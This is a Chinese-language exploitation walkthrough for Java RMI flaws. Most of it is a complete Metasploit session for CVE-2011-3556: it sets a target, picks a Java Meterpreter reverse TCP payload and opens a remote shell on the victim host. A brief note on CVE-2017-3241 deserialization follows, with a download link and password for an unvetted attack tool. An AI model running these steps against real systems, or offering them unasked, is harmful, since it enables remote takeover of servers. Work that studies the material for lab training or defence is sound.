Java rmi漏洞利用及原理记录

CVE-2011-3556

该模块利用了RMI的默认配置。注册表和RMI激活服务，允许加载类来自任何远程（HTTP）URL。当它在RMI中调用一个方法时分布式垃圾收集器，可通过每个RMI使用endpoint，它可以用于rmiregist和rmid，以及对大多

漏洞利用：

漏洞常用端口1099

msf5 > use  exploit/multi/misc/java_rmi_server
msf5 exploit(multi/misc/java_rmi_server) > show options

Module options (exploit/multi/misc/java_rmi_server):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               yes       Time that the HTTP Server will wait for the payload request
   RHOST                       yes       The target address
   RPORT      1099             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL for incoming connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                     no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Generic (Java Payload)


msf5 exploit(multi/misc/java_rmi_server) > set rhost 172.16.20.134
rhost => 172.16.20.134

msf5 exploit(multi/misc/java_rmi_server) > show payloads

Compatible Payloads
===================

   #   Name                             Disclosure Date  Rank    Check  Description
   -   ----                             ---------------  ----    -----  -----------
   0   generic/custom                                    normal  No     Custom Payload
   1   generic/shell_bind_tcp                            normal  No     Generic Command Shell, Bind TCP Inline
   2   generic/shell_reverse_tcp                         normal  No     Generic Command Shell, Reverse TCP Inline
   3   java/jsp_shell_bind_tcp                           normal  No     Java JSP Command Shell, Bind TCP Inline
   4   java/jsp_shell_reverse_tcp                        normal  No     Java JSP Command Shell, Reverse TCP Inline
   5   java/meterpreter/bind_tcp                         normal  No     Java Meterpreter, Java Bind TCP Stager
   6   java/meterpreter/reverse_http                     normal  No     Java Meterpreter, Java Reverse HTTP Stager
   7   java/meterpreter/reverse_https                    normal  No     Java Meterpreter, Java Reverse HTTPS Stager
   8   java/meterpreter/reverse_tcp                      normal  No     Java Meterpreter, Java Reverse TCP Stager
   9   java/shell/bind_tcp                               normal  No     Command Shell, Java Bind TCP Stager
   10  java/shell/reverse_tcp                            normal  No     Command Shell, Java Reverse TCP Stager
   11  java/shell_reverse_tcp                            normal  No     Java Command Shell, Reverse TCP Inline
   12  multi/meterpreter/reverse_http                    normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Mulitple Architectures)
   13  multi/meterpreter/reverse_https                   normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Mulitple Architectures)

msf5 exploit(multi/misc/java_rmi_server) > set payload  java/meterpreter/reverse_tcp

msf5 exploit(multi/misc/java_rmi_server) > show options

Module options (exploit/multi/misc/java_rmi_server):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               yes       Time that the HTTP Server will wait for the payload request
   RHOSTS     172.16.20.207    yes       The target address range or CIDR identifier
   RPORT      1099             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL for incoming connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                     no        The URI to use for this exploit (default is random)


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.20.134    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Generic (Java Payload)

msf5 exploit(multi/misc/java_rmi_server) > set lhost 172.16.20.134
lhost => 172.16.20.134
msf5 exploit(multi/misc/java_rmi_server) > run

[*] Started reverse TCP handler on 172.16.20.134:4444
[*] 172.16.20.207:1099 - Using URL: http://0.0.0.0:8080/dPdVbFGof9
[*] 172.16.20.207:1099 - Local IP: http://172.16.20.134:8080/dPdVbFGof9
[*] 172.16.20.207:1099 - Server started.
[*] 172.16.20.207:1099 - Sending RMI Header...
[*] 172.16.20.207:1099 - Sending RMI Call...
[*] 172.16.20.207:1099 - Replied to request for payload JAR
[*] Sending stage (53844 bytes) to 172.16.20.207
[*] Meterpreter session 1 opened (172.16.20.134:4444 -> 172.16.20.207:52793) at 2019-08-15 18:33:28 +0800
[*] 172.16.20.207:1099 - Server stopped.

反弹shell，利用成功

CVE-2017-3241

漏洞利用机制：1.存在反序列化传输。2.存在有缺陷的第三方库如commons-collections ，或者知道公开的类名

小天之天的测试工具：https://pan.baidu.com/s/1pb-br4vhKT6JlT6MmjHqGg 密码：jkl8